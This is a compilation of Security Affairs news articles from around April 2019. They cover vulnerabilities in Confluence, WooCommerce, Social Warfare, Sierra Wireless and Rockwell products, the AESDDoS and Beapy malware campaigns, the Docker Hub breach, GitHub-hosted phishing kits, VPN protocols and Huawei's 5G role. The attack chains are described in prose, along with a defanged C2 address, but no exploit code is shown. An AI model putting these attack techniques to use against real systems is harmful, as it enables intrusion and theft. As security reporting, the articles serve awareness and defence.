Stuart City is the new victim of the Ryuk Ransomware
The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign
Zero-day vulnerability in Oracle WebLogic
A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites
Britain ‘Approves Huawei role in building ‘non-core parts for 5G Network
Crooks abuse GitHub platform to host phishing kits
Flaws in Social Warfare plugin actively exploited in the wild
Beapy Cryptojacking campaign leverages EternalBlue exploit to spread
Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws
The strengths and weaknesses of different VPN protocols
Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices
Docker Hub Database hacked, 190,000 users impacted
Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension
Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites

Pierluigi Paganini

(SecurityAffairs – newsletter, cybersecurity)

The post Security Affairs newsletter Round 211 – News of the week appeared first on Security Affairs.

AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server

A new variant of the AESDDoS bot is exploiting a recent vulnerability in the Atlassian collaborative software Confluence.

Security experts at Trend Micro have spotted a new variant of AESDDoS botnet that is exploiting a recently discovered vulnerability in the Atlassian collaborative software Confluence.

The flaw exploited in the attacks, tracked as CVE-2019-3396, is a server-side template injection vulnerability that resides in the Widget Connector macro in Confluence Server.

Threat actors leverage the vulnerability to install denial of service (DDoS) malware and crypto-currency miners, and to remotely execute code.

“In our analysis, we saw that an attacker was able to exploit CVE-2019-3396 to infect machines with the AESDDoS botnet malware.” reads the analysis published by Trend Micro. “A shell command was remotely executed to download and execute a malicious shell script (Trojan.SH.LODEX.J), which in turn downloaded another shell script (Trojan.SH.DOGOLOAD.J) that finally installed the AESDDoS botnet malware on the affected system.”

The AESDDoS bot involved in the recent attacks has the ability to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The malware also connects to 23[.]224[.]59[.]34:48080 to send and receive remote shell commands from the attacker.

Once the malware has infected a system, it can gather system information, including model ID and CPU description, speed, family, model, and type.

The AESDDoS bot uses the AES algorithm to encrypt gathered data and data received from the C2 server.

Trend Micro researchers also discovered that the latest variant of the AESDDoS bot can modify files i.e., /etc/rc.local and /etc/rc.d/rc.local, as an autostart technique by appending the {malware path}/{malware file name} reboot command.

Atlassian has already addressed the vulnerability in the Confluence software with the release of the version 6.15.1.

“Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it,” Trend Micro concludes.

Pierluigi Paganini

(SecurityAffairs – AESDDoS bot, DDoS)

The post AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server appeared first on Security Affairs.

NIST ACTS Toolkit could find Finds bugs safety-critical systems

US NIST updates its Automated Combinatorial Testing for Software (ACTS) research toolkit that should help experts in finding bugs in complex safety-critical applications.

US NIST announced updated for its Automated Combinatorial Testing for Software (ACTS) research toolkit that should allow developers easily spot software errors in complex safety-critical applications.

The ACTS toolkit allows development teams to check their products correctly respond to simultaneous inputs that could trigger security vulnerabilities.

The toolkit, developed by researchers from NIST along with the University of Texas at Arlington, Adobe, and SBA Research, the research center for information security in Austria, is particularly useful for testing large and complex systems with thousands of input variables.

The NIST announced that the ACTS toolkit now includes an updated version of Combinatorial Coverage Measurement (CCM), a tool that should help improve safety as well as reduce software costs.

The improvements should help developers to improve the safety of their systems and to reduce development costs.

“Before we revised CCM, it was difficult to test software that handled thousands of variables thoroughly,” wrote NIST mathematician Raghu Kacker. “That limitation is a problem for complex modern software of the sort that is used in passenger airliners and nuclear power plants, because it’s not just highly configurable, it’s also life critical. People’s lives and health are depending on it.”

NIST ACTS toolkit

The early version of the NIST tools was able to handle software that had a few hundred input variables. Another tool developed by the SBA Research could be used to analyze software that has up to 2,000 input variable. This latter tool could generate a test suite for up to five-way combinations of input variables.

“The two tools can be used in a complementary fashion: While the NIST software can measure the coverage of input combinations, the SBA algorithm can extend coverage to thousands of variables.” added
Kacker.

Even is the SBA Research algorithm was not yet integrated into the ACTS toolkit, the team plans to include it in the future. Waiting for the integration, NIST will make the algorithm available to any developer who requests it.

Pierluigi Paganini

(SecurityAffairs – ACTS toolkit , NIST)

The post NIST ACTS Toolkit could find Finds bugs safety-critical systems appeared first on Security Affairs.

Docker Hub Database hacked, 190,000 users impacted

Docker became aware of unauthorized access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

Docker notified its users that an unauthorized entity gained access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

The exposed information included some usernames and hashed passwords, as well as tokens for GitHub and Bitbucket repositories.
The tokens allow development teams to automatically re-build their images on Docker Hub.

The exposure of the token could allow an attacker to modify an image and rebuild it depending on the permissions stored in the token, a typical supply chain attack scenario.

Docker was informed of the unauthorized access to a Hub database on April 25th, 2019.

“On Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data. Upon discovery, we acted quickly to intervene and secure the site.” reads the data breach notice sent to the impacted users via email.

“During a brief period of unauthorized access to a Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.”

docker logo-696x364

The organization confirmed to have already revoked all the exposed tokens and access keys.

“it is important for developers who used Docker Hub autobuild to check their project’s repositories for unauthorized access. ” reads a blog post published by Bleeping computer that first reported the news. “Even worse, with these notices coming late on a Friday night, developers potentially have a long night ahead of them as they assess their code.

The test of the data breach notification notice is available here:

https://news.ycombinator.com/item?id=19763413

Maintainers of the open source project are asking users to change their password on Docker Hub and any other accounts that shared the same credentials.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Docker Hub Database hacked, 190,000 users impacted appeared first on Security Affairs.

Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension

WordPress-based eCommerce websites using the WooCommerce plugin are at risk of full compromise due to an unpatched vulnerability.

A WordPress security firm called ‘Plugin Vulnerabilities’ has discovered a critical vulnerability in the WooCommerce plugin that exposes
WordPress-based eCommerce websites to hack.

The vulnerability affects the WooCommerce Checkout Manager plugin that allows owners of e-commerce websites based on WordPress and running the WooCommerce plugin to customize forms on their checkout pages.

The experts discovered an “arbitrary file upload” vulnerability that can be exploited by unauthenticated, remote attackers when the websites have “Categorize Uploaded Files” option enabled within WooCommerce Checkout Manager plugin settings.

Currently the plugin is used by more than 60,000 websites.

The company decided to publish the details of the flaw and a proof-of-concept exploit to protest against maintainers of the WordPress Support forum. It declared that over the years has tried to report the vulnerabilities directly to the WordPress Support forum without success because the moderators have been systematically removed their posts warning the community.

The company is focused on discovering vulnerabilities in popular and widely adopted WordPress plugins.

Analyzing the code, the experts discovered that at line 2084 of the
‘includes/admin.php’ file the application moves specific files to a directory using ‘move_uploaded_file’ without prior proper check for allowed files,”

The vulnerability could be exploited by attackers to execute arbitrary server-side script code in the context of the web server process and compromise the application to access or modify data or gain administrative access.

“If that is enabled then the following code will be used, which allows arbitrary files to be uploaded: ” wrote the experts.

woocommerce

“So a hacker could use that to upload malicious .php files at a location they could then access, as the proof of concept below shows.”

Below the proof-of-concept released by the experts:

woocommerce

Even the latest WooCommerce Checkout Manager version 4.2.6 is affected by the flaw.

To mitigate the flaw the experts suggest owners of WordPress websites using the WooCommerce Checkout Manager plugin to either disable “Categorize Uploaded Files” option or disable the plugin.

Pierluigi Paganini

(SecurityAffairs – WooCommerce, hacking)

The post Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension appeared first on Security Affairs.

Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices

Experts at Cisco Talos group disclosed a dozen vulnerabilities uncovered in Sierra Wireless AirLink gateways and routers, including several serious flaws.

Researchers at Cisco Talos group disclosed a dozen vulnerabilities affecting Sierra Wireless AirLink gateways and routers, including several serious flaws. Some of the flaws could be exploited to execute arbitrary code, modify passwords, and change system settings,

Sierra Wireless AirLink gateways and routers are widely used in enterprise environments to connect industrial equipment, smart devices, sensors, point-of-sale (PoS) systems, and Industrial Control systems (ICSs).

“Several exploitable vulnerabilities exist in the Sierra Wireless AirLink ES450, an LTE gateway designed for distributed enterprise, such as retail point-of-sale or industrial control systems.” reads the analysis published by Cisco Talos.

“These flaws present a number of attack vectors for a malicious actor, and could allow them to remotely execute code on the victim machine, change the administrator’s password and expose user credentials, among other scenarios.”

Most of the issues reside in ACEManager, the web server included with the ES450. 

Sierra Wireless es450

Experts discovered three flaws classified as “critical” (CVSS score 9.9) that can be exploited by an attacker to make changes to any system settings and execute arbitrary commands and code. An authenticated attacker could exploit the flaw by sending specially crafted HTTP requests to the targeted device.

Other three flaws, rated as “high severity,” could be exploited by an authenticated attacker to change the user password and obtain plaintext passwords and other sensitive information. One of the issues affects the SNMPD function of the Sierra Wireless AirLink ES450  and it can be exploited by attackers to activate hardcoded credentials on a device, resulting in the exposure of a privileged user.

The remaining issues have been classified as “medium severity,” they include cross-site request forgery (CSRF), cross-site scripting (XSS), and information disclosure issues.

At the time of writing, Sierra Wireless has yet to release a security advisory for these vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – IoT, hacking)

The post Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices appeared first on Security Affairs.

Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws

Experts discovered security flaws in the iLnkP2P peer-to-peer (P2P) system that exposes millions of IoT devices to remote attacks.

Security expert Paul Marrapese discovered two serious vulnerabilities in the iLnkP2P P2P system that ìs developed by Chinese firm Shenzhen Yunni Technology Company, Inc. The iLnkP2P system allows users to remotely connect to their IoT devices using a mobile phone or a PC.
Potentially affected IoT devices include cameras and smart doorbells.

The iLnkP2P is widely adopted by devices marketed from several vendors, including Hichip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.

The expert identified over 2 million vulnerable devices exposed online,
39% of them are located in China, 19% in Europe, and 7% in the United States. Roughly 50% of vulnerable devices is manufactured by Chinese company Hichip.

The first iLnkP2P flaw tracked as CVE-2019-11219 is an enumeration vulnerability that could be exploited by an attacker to discover devices exposed online. The second issue tracked as CVE-2019-11220 can be exploited by an attacker to intercept connections to vulnerable devices and conduct man-in-the-middle (MitM) attacks.

An attacker could chain the issues to steal password theft and possibly remotely compromise the devices, he only needs to know the IP address of the P2P server used by the device.

Marrapese also built a proof-of-concept attack to demonstrate how to steal passwords from devices by abusing their built-in “heartbeat” feature, but he will not release it to prevent abuse.

“Upon being connected to a network, iLnkP2P devices will regularly send a heartbeat or “here I am” message to their preconfigured P2P servers and await further instructions.” reported Brian Krebs.

“A P2P server will direct connection requests to the origin of the most recently-received heartbeat message,” Marrapese said. “Simply by knowing a valid device UID, it is possible for an attacker to issue fraudulent heartbeat messages that will supersede any issued by the genuine device. Upon connecting, most clients will immediately attempt to authenticate as an administrative user in plaintext, allowing an attacker to obtain the credentials to the device.”

iLnkP2P flaws

The expert attempted to report the flaws to the impacted vendors since January, but he did receive any response from them. The expert reported the flaws to the CERT Coordination Center (CERT/CC) at the Carnegie Mellon University, the Chinese CERT was also informed of the discovery.

The bad news is that there is no patch to address both issues and experts believe they are unlikely to be released soon,

“The nature of these vulnerabilities makes them extremely difficult to remediate for several reasons,” Marrapese wrote. “Software-based remediation is unlikely due to the infeasibility of changing device UIDs, which are permanently assigned during the manufacturing process. Furthermore, even if software patches were issued, the likelihood of most users updating their device firmware is low. Physical device recalls are unlikely as well because of considerable logistical challenges. Shenzhen Yunni Technology is an upstream vendor with inestimable sub-vendors due to the practice of white-labeling and reselling.”

Marrapese recommends discarding vulnerable products, he also suggests restricting access to UDP port 32100 to prevent external connections via P2P.

The researcher published technical details on his discovery here.

Pierluigi Paganini

(SecurityAffairs – iLnkP2P flaws, IoT)

The post Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws appeared first on Security Affairs.

Beapy Cryptojacking campaign leverages EternalBlue exploit to spread

Security experts uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit.

Security experts at Symantec have uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit to spread a cryptocurrency malware on enterprise networks in Asia.

“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published Symantec.

Beapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector.”

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system, it is installed by leveraging the ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploitthat could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

Every Window machine running an old vulnerable version that exposes an SMB service is at risk of hack. The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online by ShadowBrokers hacker group.

Most of the victims are located in China (80%), remaining in South Korea, Japan, and Vietnam.

The experts first observed the campaign in January, almost any victim is an enterprise (98%).

The attack chain starts with phishing email using as an attachment the Excel document that downloads the DoublePulsar backdoor used to deliver the EternalBlue exploit.

Once the backdoor is installed, a PowerShell command will allow the malware to connect the command and control server. The malicious code executes more PowerShell scripts before the crypto currency miner is downloaded.

Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.

Experts at Symantec also discovered an earlier version of Beapy malware that hit a public-facing web server and that was attempting to spread to connected systems.

It was coded in C rather than Python, this version also includes both
EternalBlue and Mimikatz.
The malicious code also leverages other exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.

“In the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.” continues the analysis. “Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C&C server first observed on March 13. Activity targeting this web server continued until early April.”

Experts observed a spike in the activity of Beapy in March:

Beapy malware

Since Coinhive cryptocurrency mining service shut down in March, experts observed a drop in cryptojacking attacks.

Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.

“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”

Beapy-malware-

The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and a Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Beapy miner, hakcing)

The post Beapy Cryptojacking campaign leverages EternalBlue exploit to spread appeared first on Security Affairs.

The strengths and weaknesses of different VPN protocols

One in four internet users use a VPN regularly, but how much does the average user know about what goes on behind the software?

Pulling back the curtain, a VPN runs on various VPN protocols that govern the way a VPN client communicates with a VPN server. Different protocols create different ways that connect your device and the internet through encrypted tunnels.

The history of VPN protocols dates back to 1996 when a Microsoft employee came up with Peer-to-Peer Tunneling Protocol (PPTP). The protocol, though not perfect, allowed people to work from home through a secure internet connection.

Since then, VPN protocol technology has evolved and, at the moment, there are five widely used VPN protocols. A breakdown of these five VPN protocols complete with their pros and cons is key to understanding VPN protocols in depth.

VPN

1. PPTP

As noted above, Peer-to-Peer Tunneling Protocol was the first to be developed, and it is over 20 years old. The protocol relies on encryption, authentication and peer-to-peer protocol (PPP) negotiation. In essence, that means it only needs a username, password, and server address to create a connection.

Most devices support PPTP and because of how easy it is to set-up and is rather popular among VPN companies. PPTP is incredibly fast, and as a result, people who want to circumvent geo-restricted content prefer the protocol.

However, the speed comes at the cost of encryption. Of all the protocols, PPTP has the lowest level of encryption. Even Microsoft recommends that people stay away from PPTP because, from a security standpoint where encryption is key, PPTP is extremely unsafe.

That said, if your only concern is speed, then PPTP is the protocol for you.

Pros

  • Super-fast
  • Easy to set up and use
  • Nearly all platforms support the protocol

Cons

2. OpenVPN

First released in 2001, the OpenVPN protocol has become one of the most popular and widely used protocols. It is an open-source protocol which means coders can add to or edit the protocol, scrutinize the source code for vulnerabilities, and solve identified issues immediately.

OpenVPN uses SSL technology, and it is available on nearly all platforms, including Windows, Linux, iOS, Android, macOS, Blackberry, and routers. It operates on both Layer 2 and 3, and it contains extra features that facilitate the transport of IPX packets and Ethernet frames. Moreover, it has NetBIOS functionality and depending on the setup; it can share port 443 with HTTPS.

OpenVPN is incredibly secure thanks to the fact that it uses a 160-bit SHA1 hash algorithm, AES 256-bit key encryption (in addition to others), and 2048-bit RSA authentication.

That said, OpenVPN has a significant weakness—the amount of latency or rather the considerable delay during operation. With the use of more powerful computers and the use of SSL certificates, one can get around this weakness.

Pros

  • Secure
  • Easily bypasses firewalls
  • Supports a variety of cryptographic algorithms
  • It is open-source which means it’s easy to vet
  • Supports Perfect Forward Secrecy

Cons

  • Needs a third-party software for set-up
  • It can be difficult to configure
  • Potentially higher latency periods

3. L2TP/IPsec

To fully understand Layer 2 Tunneling Protocol (L2TP), it is essential first to mention Layer 2 Forwarding (L2F). Cisco developed L2F soon after the release of PPTP to try and improve on the flaws of PPTP. Unfortunately, L2F wasn’t perfect either.

Therefore, in 1999, they concerned released L2TP as an improvement on both PPTP and L2F. L2TP combines the best of both L2F and PPTP to provide a more secure and reliable tunneling protocol.

However, note that L2TP is simply a tunneling protocol and provides neither encryption nor privacy. Due to the lack of encryption, L2TP cannot function as a secure protocol alone and must be paired with IPsec which is a security protocol that carries with it the required encryption. The bundling of L2TP and IPsec protocols leads to the use of something known as double encapsulation.

In double encapsulation, the first encapsulation will create a PPP connection to a remote host and the second encapsulation will contain IPsec.

L2TP supports AES 256 encryption algorithms—some of the most secure—and it prevents man-in-the-middle attacks because data cannot be altered when in transit between the sender and receiver.

Bear in mind that due to the double encapsulation, the protocol has reduced speed. Moreover, the L2TP protocol can only communicate via User Datagram Protocol (UDP). The restriction to UDP means it is easy to block.

Pros

  • Secure according to most
  • Works in almost all platforms
  • Easy to set up
  • Supports multithreading which increases performance

Cons

  • Both Edward Snowden and John Gilmore noted that NSA might have deliberately weakened IPSec which means it can be compromised.
  • Firewalls can easily block it because it only communicates over UDP.
  • Slower than OpenVPN due to double encapsulation

4. SSTP

Secure Socket Tunneling Protocol (SSTP) is very similar to OpenVPN with the only difference being that it is proprietary software that Microsoft developed and introduced in Windows Vista.

Just like OpenVPN, SSTP supports AES 256-bit key encryption, and it uses 2048-bit SSL/TSL certificates for authentication. The protocol has native support for Linux, Windows, and BSD systems. The rest, e.g., Android and iOS only have support via third-party clients.

Pros

  • Provides support for a wide range of cryptographic algorithms
  • Supports Perfect Forward Secrecy
  • Easy to use especially because the protocol is already integrated into Windows

Cons

  • Does not do as well on other systems as it does on Windows
  • It is impossible to audit underlying code because the protocol is proprietary

5. IKEv2

Internet Key Version 2 (IKEv2) is a tunneling protocol that provides a secure key exchange session. The protocol was a collaboration between Microsoft and Cisco. Similar to L2TP, it is often paired with IPsec to provide for authentication and encryption.

IKEv2 is uniquely suited to mobile VPN solutions. That is because it is very good at reconnecting anytime there is a temporary loss of internet connection. Second, it is adept at reconnecting during a network switch (e.g. from mobile data to Wi-Fi).

IKEv2 is not as popular as OpenVPN, PPTP or L2TP/IPsec but a good number of VPNs, especially those that specialize in mobile VPNs use it. Because it is proprietary software, it only has native support for Windows, iOS, and Blackberry.

Pros

  • Extremely stable and does not drop the VPN connection when switching networks
  • Incredibly fast
  • Supports Perfect Forward Secrecy
  • Supports a variety of cryptographic algorithms
  • Easy to set-up

Cons

  • Suffers from the same IPsec drawbacks (NSA tampering)
  • Does not support a considerable number of platforms
  • Firewalls can block the protocol

Summary

From the discussion above; the one clear thing is that no one VPN protocol can satisfy all the user requirements. Some VPN protocols prioritize speed while other prioritize security.

Consequently, it is not a surprise to find a VPN provider that has found a way to incorporate all five in a bid to provide the best possible service.

About the author: Susan Alexandra

Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – VPN, privacy)


The post The strengths and weaknesses of different VPN protocols appeared first on Security Affairs.

Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware

The special-purpose vehicle maker Aebi Schmidt was hit by a malware attack that disrupted some of its operations.

The Aebi Schmidt Group is a manufacturer of product systems and services for the management, cleaning and clearance of traffic areas as well as for the maintenance of green areas in demanding terrain.

Aebi Schmidt focuses on manufacturing agricultural, municipal and other special-purpose vehicles, including snow blowers, street cleaners, and other machinery used in airports.

On Thursday Aebi Schmidt announced that its systems had been hit by a malware-based cyberattack. The incident caused the disruption of some of its operations, such as email management.

The malware only infected Windows systems, in response to the incident the company temporarily switched off these systems.

“The IT system failure is due to an attempt by third parties to infiltrate malware into our systems. More and more companies worldwide are being affected by such attacks.” reads a note published by the company on its website.

Aebi Schmidt

The company notified the incident to customers and business partners, it asked them to contact it via phone until its email systems are restored.

Fortunately, the cyber attack has not impacted production systems, order processing, US-based M-B Companies, or its telematics platform.

Windows systems are currently being “rebooted step by step,” but the process could be “time consuming.”

Aebi Schmidt did not share technical details of the cyber attack, but according to TechCrunch, the company was hit by a ransomware.

“Aebi Schmidt, a European manufacturing giant with operations in the U.S., has been hit by a ransomware attack, TechCrunch has learned. ” reads the post published by TechCrunch. “Schiess [spokesperson Thomas Schiess  ] would not comment on claims of ransomware specifically, but the source said staff were told during an all-hands meeting Wednesday that the incident was a “ransomware attack.” “

Recently another major European company was hit by ransomware, the aluminum giant Norsk Hydro suffered an extensive cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S. The company estimated more than $40 million losses in the first week following the ransomware attack that disrupted its operations.

Pierluigi Paganini

(SecurityAffairs – Aebi Schmidt, ransomware)

The post Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware appeared first on Security Affairs.

Crooks abuse GitHub platform to host phishing kits

Experts at Proofpoint discovered that free code repositories on GitHub have been abused since at least 2017 to host phishing websites.

Researchers at Proofpoint reported that crooks are abusing free code repositories on GitHub to host phishing websites and bypass security defenses. Experts discovered that cybercriminals are abusing the GitHub service since at least mid-2017.

The phishing websites were hosted on the canonical $github_username.github.io domain. Attackers are using stolen brand graphics to make their pages resemble the brand they were abusing.

“Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical  $github_username.github.io domain.” reads the post published by Proofpoint. “threat actors establish a canonical code repository site within the github.io canonical domain that resembles the brand they are abusing.”

The inspection of the lookalike GitHub account used by crooks revealed
the files in the phishing kit are viewable as follows, experts noticed that the HTML code is lightly encoded in order to obfuscate the content.

phishing Github sites

The code sends credentials provided by the users in an HTTP POST request to another compromised site under the control of the attackers.

The phishing kits do not use typical hosted PHP methods because the github.io platform does not provide PHP back-end services.

Experts observed that cybercriminals in some cases used the github.io domain as a traffic redirector with the intent to ensure that the actual phishing page remains live for a bit longer.

The drawback in using public GitHub accounts it that security researchers have major visibility into the threat actors’ activity and on the changes to their phishing pages.

Proofpoint identified a particular user, “greecpaid,” who manages several phishing kits hosted on GitHub repositories.

Proofpoint reported its findings to GitHub that took down the accounts hosting phishing kits.

“In the past, threat actors have been able to evade detection by using well-known and trusted consumer cloud, social networking, and commerce services to host files as well as web hosts. Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint concludes. 

Pierluigi Paganini

(SecurityAffairs – GitHub, cybercrime)

The post Crooks abuse GitHub platform to host phishing kits appeared first on Security Affairs.

Flaws in Social Warfare plugin actively exploited in the wild

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the popular WordPress plugin Social Warfare.

Social Warfare is a popular ùWordPress plugin with more than 900,000 downloads, it allows to add social share buttons to a WordPress website.

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the Social Warfare plugin to take control over WordPress websites using it.

At the end of March, experts found a Cross-Site Scripting (XSS) vulnerability in Social Warfare installations (v3.5.1 and v3.5.2) that is actively exploited to add malicious redirects.

Maintainers of Social Warfare for WordPress also addressed a remote code execution (RCE), both issues were tracked as CVE-2019-9978.

The issue in the WordPress plugin has been fixed with the release of the 3.5.3 version of the plugin. In the same day, an unnamed security researcher published technical details of the flaw and a proof-of-concept exploit for the stored Cross-Site Scripting (XSS) vulnerability.

Experts pointed out that attackers can exploit the vulnerabilities to take complete control over websites and servers and use them for malicious purposed, such as mining cryptocurrency or deliver malware.

The availability of the exploit code allowed attackers attempting to exploit the vulnerability, but hackers were only able to inject JavaScript code to redirect users to malicious sites.

Experts at Palo Alto Network discovered several exploits for both vulnerabilities in the wild, including an exploit for the RCE one.

“We also caught several samples exploiting these vulnerabilities in the wild,” reads a blog post published by PaloAlto Network Unit42 researchers. “Figure 5 shows a POST request from one of the samples: “

Social Warfare zero-day PoC

The root cause of both flaws is the misuse of the is_admin() function in WordPress.

“The root cause of each of these two vulnerabilities is the same: the misuse of the is_admin() function in WordPress,” the researchers say in a blog post. “Is_admin only checks if the requested page is part of admin interface and won’t prevent any unauthorized visit.”

Experts found about 40,000 sites that are using the Social Warfare plugin, most of which are running a vulnerable version.

Vulnerable websites belong to many industries, such as education, finance sites, and news, experts highlighted that many of these sites receive high traffic.

“There are many exploits in the wild for the Social Warfare plugin and it is likely they will continue to be used maliciously. Since over 75 million websites are using WordPress and many of the high traffic WordPress websites are using the Social Warfare plugin, the users of those websites could be exposed to malware, phishing pages or miners.” concludes PaloAlto Network. “Website administrators should to update the Social Warfare plugin to 3.5.3 or newer version.”

Pierluigi Paganini

(SecurityAffairs – WordPress, Social Warfare plugin)



The post Flaws in Social Warfare plugin actively exploited in the wild appeared first on Security Affairs.

Britain ‘Approves’ Huawei role in building ‘non-core’ parts for 5G Network

British Government has approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers

According to The Daily Telegraph newspaper, British Prime Minister Theresa May decided to assign a limited role to Chinese telco giant Huawei in the building of a 5G network in the UK.

The approval continues to raise concerns because the Government ignored security warnings from senior ministers and the US Government.

Home Secretary Sajid Javid, Foreign Secretary Jeremy Hunt, Defence Secretary Gavin Williamson, International Trade Secretary Liam Fox and International Development Secretary Penny Mordaunt raised serious concerns on the decision.

Britain’s National Security Council approved a limited role for Huawei to help build a “non-core” infrastructure such as antennas”

“Theresa May has given the green light to a Chinese telecoms giant to help build Britain’s new 5G network despite warnings from the US and some of her most senior ministers that it poses a risk to national security.” reads the post published by The Daily Telegraph.

“The National Security Council, which is chaired by the Prime Minister, agreed on Tuesday to allow Huawei limited access to help build parts of the network such as antennas and other “noncore” infrastructure.”

The decision comes as the chancellor Philip Hammond prepares to travel to China to promote the participation of his government in the Belt and Road Initiative.

“According to one person briefed on the discussions, Mrs May approved “in principle” the recent assessment by the National Cyber Security Centre, part of GCHQ, that the risk from Huawei to future 5G telecoms networks could be mitigated.” reported The Financial Times.

At the time of writing, Digital Minister Margot James denied the news reported by the media.

“In spite of cabinet leaks to the contrary, final decision yet to be made on managing threats to telecoms infrastructure,” she tweeted.

“The decision has not been finally made yet and the Prime Minister will take advice form all of the relevant agencies and departments,” she
told Sky News.

On the other side, Huawei praised the alleged decision of the UK government,

“Huawei welcomes reports that the UK government is moving towards allowing Huawei to help build the UK’s 5G network,” it said in a brief statement.

“This green light means that UK businesses and consumers will have access to the fastest and most reliable networks thanks to Huawei’s cutting edge technology.”

“While we await a formal government announcement, we are pleased that the UK is continuing to take an evidence-based approach to its work and we will continue work cooperatively with the government, and the industry,” the Chinese company added.

What will happen after this decision?

The UK is a member of the Five Eyes intelligence alliance (US, UK, Australia, Canada, and New Zealand) and agencies from other countries already expressed their ban on Chinese technology and the decision could raise a heated debate..

Earlier this month Germany also announced that it would not ban Huawei from the auction to build its 5G network.

Pierluigi Paganini

(SecurityAffairs – Huawei, 5G)

The post Britain ‘Approves’ Huawei role in building ‘non-core’ parts for 5G Network appeared first on Security Affairs.

A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites

A serious flaw in some of Rockwell Automation’s MicroLogix and CompactLogix PLCs can be exploited by a remote attacker to redirect users to malicious websites.

Some of Rockwell Automation’s MicroLogix and CompactLogix PLCs are affected by a serious vulnerability can be exploited by a remote attacker to redirect users to malicious websites.

The vulnerabilyt was tracked as CVE-2019-10955 and received a CVSS score of 7.1 (high severity), it affects MicroLogix 1100 and 1400, and CompactLogix 5370 (L1, L2 and L3) controllers.

Both the ICS-CERT and Rockwell Automation published a security advisory.

The flaw is an open redirect vulnerability that ties the web server running on vulnerable devices. According to the expert, the web server accepts user input from the PLCs web interface and a remote, unauthenticated attacker can inject a malicious link that redirects users from the controller’s web server to a malicious website.

“Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to input a malicious link redirecting users to a malicious website.” reads the advisory published by the US ICS-CERT.

“An open redirect vulnerability could allow a remote unauthenticated attacker to input a malicious link to redirect users to a malicious site that could run or download arbitrary malware on the user’s machine.”

Rockwell Automation’s MicroLogix

According to the attack scenario described in the security advisory published by Rockwell (available to registered users), the malicious website could be used to deliver malware on the user’s machine.

“This malicious website could potentially run or download arbitrary malware on the user’s machine. The target of this type of attack is not the industrial control device and does not disrupt its control functionality,” reads the advisory published by Rockwell.

Rockwell has released firmware updates that address the vulnerability for the affected controllers. To mitigate the issue it is possible to disable the web server.

Below the recommendations published by Rockwell Automation to minimize the risk of exploitation of this vulnerability:

  • Update to the latest available firmware revision that addresses the associated risk.
  • Use trusted software, software patches, anti-virus/anti-malware programs, and interact only with trusted websites and attachments.
